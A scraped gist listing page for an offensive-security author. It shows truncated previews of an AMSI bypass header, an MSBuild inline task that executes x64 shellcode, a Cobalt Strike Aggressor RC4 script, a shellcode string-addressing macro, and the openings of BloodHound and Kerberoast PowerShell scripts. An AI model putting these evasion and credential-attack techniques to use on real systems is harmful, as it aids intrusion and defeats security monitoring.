CCob / patchless_amsi.h
Created Apr 17, 2022
In-Process Patchless AMSI Bypass
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
CCob / execute_x64_shellcode.xml
Last active May 19, 2021
Execute x64 Shellcode
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes x64 shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
CCob / rc4.cna
Created Jan 28, 2021
Aggressor Script for RC4 encryption
#RC4 encryption implementation using Java Crypto API
#Author: @_EthicalChaos_
import javax.crypto.spec.*;
import javax.crypto.*;
# $1 = plaintext, $2 = key
sub encryptRC4{
CCob / x86_relative_shellcode_strings.c
Last active May 11, 2022
x86 Relative String Addressing Hack
#include <stdio.h>
#ifdef _WIN64
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x48\x83\xc0\x06\xc3" str;
#elif _WIN32
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
View IBH.txt
function Invoke-BH{
$CollectionMethod = [string[]] @('Default'),
View IKR.txt
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
Note: the primary method of use will be Invoke-Kerberoast with
various targeting options.